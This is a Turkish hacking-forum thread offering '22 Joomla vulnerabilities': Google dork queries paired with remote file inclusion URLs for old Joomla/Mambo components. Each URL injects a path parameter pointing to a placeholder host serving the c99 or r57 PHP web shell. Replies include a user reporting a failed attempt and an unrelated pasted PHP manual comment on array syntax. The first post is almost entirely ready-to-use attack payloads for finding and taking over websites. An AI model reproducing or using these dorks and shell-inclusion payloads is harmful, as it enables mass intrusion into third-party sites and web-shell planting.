22 Adet Joomla Açığı

pit10_mikado

Katılımcı Üye
26 Eyl 2006
651
3
biyerlerden
Google Araması:
inurl:index.php?option=com_simpleboard
KOD:
/components/com_simpleboard/file_upload.php?sbp=http://shelladresi/c99shell.txt?
-------------------------------------------------------------
Google Araması:

inurl:"com_hashcash"
KOD:
/components/com_hashcash/server.php?mosConfig_absolute_path=http://shelladresi/c99shell.txt?
---------------------------------------------------------------
Google Araması:
inurl:"com_htmlarea3_xtd-c"

KOD:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://shelladresi/c99shell.txt?
---------------------------------------------------------------
Google Araması:
inurl:"com_sitemap"

KOD:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://shelladresi/c99shell.txt?
---------------------------------------------------------------

Google Araması:
inurl:"com_forum"

KOD:
/components/com_forum/download.php?phpbb_root_path=http://shelladresi/c99shell.txt?
---------------------------------------------------------------
Google Araması:
inurl:"com_pccookbook"

KOD:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://shelladresi/c99shell.txt?
----------------------------------------------------------------
Google Araması:
inurl:index.php?option=com_extcalendar

KOD:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://shelladresi/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"minibb"

KOD:
components/minibb/index.php?absolute_path=http://shelladresi/c99shell.txt?
---------------------------------------------------------------------
Google Araması:
inurl:"com_smf"

KOD:
/components/com_smf/smf.php?mosConfig_absolute_path=http://shelladresi/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_pollxt"

KOD:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://shelladresi/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_loudmounth"

KOD:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://shelladresi/c99shell.txt?
------------------------------------------------------------------------
Google Araması:
inurl:"com_videodb"

KOD:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http ://shelladresi/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:index.php?option=com_pcchess

KOD:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://shelladresi/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_multibanners"

KOD:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=ht tp://shelladresi/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_a6mambohelpdesk"


KOD:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http ://shelladresi/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_colophon"

KOD:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://shelladresi/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_mgm"

KOD:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://shelladresi/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_mambatstaff"

KOD:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://shelladresi/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_securityimages"

KOD:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://shelladresi/c99shell.txt?

KOD:
/components/com_securityimages/lang.php?mosConfig_absolute_path=http://shelladresi/c99shell.txt?
-----------------------------------------------------------------------

Google Araması:
inurl:"com_artlinks"

KOD:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http: //shelladresi/c99shell.txt?
-----------------------------------------------------
Google Araması:
inurl:"com_galleria"

KOD:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://shelladresi/c99shell.txt?

----------------------------------------------------
google araması:
allinurl:"com_jd-wiki"
KOD:
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shelladresi/r57.txt?
 

ssyunuss

Yeni üye
12 Tem 2007
5
0
KANKA DEDIKLERINI YAPTIM BOLE BİŞİ CIKTII ANLAMADIMM
<DIV class="manualnavbar manualnavbar_top"> Resource<IMG height=7 alt=">" src="http://tr2.php.net/images/caret-r.gif" width=11> <SPAN class=prev><A href="http://tr2.php.net/manual/en/language.types.array.php"></P><DIV class="manualnavbar manualnavbar_bottom"> Resource<IMG height=7 alt=">" src="http://tr2.php.net/images/caret-r.gif" width=11> <SPAN class=prev><A href="http://tr2.php.net/manual/en/language.types.array.php"></P><DIV class="manualnavbar manualnavbar_bottom"> Resource<IMG height=7 alt=">" src="http://tr2.php.net/images/caret-r.gif" width=11> <SPAN class=prev><A href="http://tr2.php.net/manual/en/language.types.array.php">
 

ssyunuss

Yeni üye
12 Tem 2007
5
0
php at electricsurfer.com,

More than a year later and here's some clarification of what's happening in your code, via comments in an otherwise verbatim copy.

<?
class c
{
var $a = array('a'=>'aa','b'=>'ab');
var $b = 'c';

function show()
{
echo $this->a['a']; // -> 1st
echo $this->a['b']; // outputs 'ab'

$a = 'a';
$b = 'b';

echo $this->$a[$a]; // [] 1st, not what I expected
//Above first becomes $this->$a['a'] by looking at the function's local $a
//Next it becomes $this->a by again looking at the function's local $a, which references the class variable $a with no subscripts.
// In order to reference elements of the class variable $a,
// you want to use $this->a[$a]

echo $this->$a[$b]; // does NOT output 'ab'
// Same as above, but the first step $b becomes 'b'

$this_a =& $this->$a; // work-around

echo $this_a[$a]; // no question
echo $this_a[$b];

$a_arr = array('a'=>'b');

echo $this->$a_arr[$a]; // [] 1st => outputs 'c'
// This becomes $this->$a_arr['a'] which becomes $this->c,
// by referencing the local variables first.
}
}
$c = new c();
$c->show();
?>
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.